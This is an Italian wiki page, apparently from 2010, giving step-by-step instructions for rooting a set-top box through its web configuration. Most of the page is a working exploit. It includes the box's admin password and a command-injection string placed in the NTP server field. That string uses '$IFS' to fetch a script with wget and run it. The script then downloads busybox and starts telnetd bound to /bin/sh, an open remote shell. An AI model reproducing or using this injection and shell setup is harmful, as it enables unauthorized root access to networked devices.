Traccia: NTP Exploit

NTP Exploit

  • Impostare sul PC l'indirizzo IP 83.221.117.229
  • Eseguire un server DHCP impostato per rilasciare indirizzi da 83.221.117.200 a 83.221.117.220
  • Disattivare eventuali altri server DHCP
  • Accendere il STB e attendere la fine del boot
  • Aprire un browser alla pagina http://83.221.117.200:1980 (o qualunque altro indirizzo abbia preso il STB)
  • Entrare con password t30d0r1c0
  • Impostare nel campo relativo al server NTP la seguente stringa:
pool.ntp.org;$(cd$IFS/tmp;/usr/bin/wget$IFS\http://83.221.117.229/script.sh;/bin/sh$IFS/tmp/script.sh)
  • Attivare un server HTTP sul proprio PC
  • Preparare un file script.sh fatto così:
mount -t tmpfs -osize=2m tmpfs /mnt

cd /mnt
/usr/bin/wget http://83.221.117.229/telnetd
/bin/chmod 0777 /mnt/telnetd
/mnt/telnetd -l /bin/sh
  • Copiare il file script.sh nella root directory del server web
  • Prelevare busybox26 dal sito di lundman, rinominare il file busybox26 in telnetd e copiarlo nella root directory del server web
  • Accendere il STB e attendere la fine del boot
  • Utilizzare un client telnet per connettersi

Credits: Cyberstorm, Roleo su Ilpuntotecnicoeadsl Forum

ntp_exploit.txt · Ultima modifica: 2010/05/08 12:26 da 83.211.179.90
CC Attribution-Noncommercial-Share Alike 3.0 Unported
chimeric.de = chi`s home Creative Commons License Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0